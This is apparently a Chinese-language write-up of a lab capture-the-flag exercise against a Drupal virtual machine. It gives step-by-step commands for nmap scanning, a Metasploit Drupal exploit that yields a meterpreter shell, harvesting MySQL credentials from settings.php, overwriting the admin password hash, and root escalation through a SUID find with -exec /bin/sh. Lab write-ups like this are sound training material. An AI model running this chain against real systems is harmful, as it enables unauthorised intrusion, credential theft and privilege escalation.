该文详细描述了一次网络安全渗透测试的过程,包括使用nmap扫描网络,发现存活主机和开放端口,利用wappalyzer识别中间件,针对Drupal系统的漏洞进行搜索和利用,通过msfconsole执行exploit,获取meterpretershell。接着,文章展示了如何通过MySQL数据库获取权限,修改密码,以及使用find命令寻找敏感文件,最终目标是找到并解密隐藏的flag文件。
扫描全网段,找到存活主机,ip为192.168.85.140
nmap 192.168.85.0/24
发现有80端口开放,访问以下
3.利用wappalyer看中间件,使用了drupal
4.使用kali搜索drupal的漏洞,并利用
msfconsole #打开msf
search drupal #搜索和drupal相关的信息使用第一个exp
use 1
show options #查看要配置的参数这个地方yes是必填项,rport需要改成1898
set rhosts 192.168.85.140 #设置目标ip
run #运行成功获取meterpreter
查看权限
getuid
python -c 'import pty;pty.spawn("/bin/bash")' #使用python创建交换式shell查看当前目录下的文件,并查看flag1.txt文件
ls
cat flag.txt
flag1.txt意思是所有cms都需要配置文件,你也一样,需要找配置文件
配置文件可能是config之类的或者setting之类的,config没看到重要的文件
find / -name 'conf*'
或者
find / -name 'setting*'
看到settings.php,查看此文件
cat ./sites/default/settings.php
看到flag2.txt,意思是暴力破解和字典攻击不是唯一进入的方法(你需要权限时),你可以尝试那些凭证做什么
发现下方有配置信息,像是mysql
用户名: dbuser
密码: R0ck3t
查看一下端口开放情况
nestat -anlpt
发现3306时开启的,登录mysql
mysql -udbuser -pR0ck3t查数据库:
show databases;
查数据表:
use drupaldb;
show tables;
发现users,查数据:
select * from users;
不知道什么加密,看一下有没有加密脚本
find / -name 'pass*'
发现脚本,运行一下脚本
./scripts/password-hash.sh 123456
加密后的值和mysql中的很像,加密后的值
$S$DXULlaGXubXoeo0H5wlwzwpN703KiOmeccTsbpbMUFdJ0CqnSucM
不知道为什么进入到scripts目录运行就出错:
再次登录进入到mysql,改密码
mysql -udbuser -pR0ck3t
use drupaldb;
update users set pass='$S$DXULlaGXubXoeo0H5wlwzwpN703KiOmeccTsbpbMUFdJ0CqnSucM' where uid=1;web界面登录
admin
123456在登录后找一下flag
flag3.txt意思是特殊的PERMS 将帮助查找passwd——但是您需要-exec 该命令来确定如何获取shadow中的内容。
查看/etc/passwd:
cat /etc/passwd
查看flag4.txt
cat /home/flag4/flag4.txt
意思是可以使用和find相同的方法去获取root目录下的flag
find提权
find . -exec '/bin/sh' \; #反弹本地
反弹shell生成命令:
[~]#棱角 ::Edge.Forum* (ywhack.com)
参考文章:
1520
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
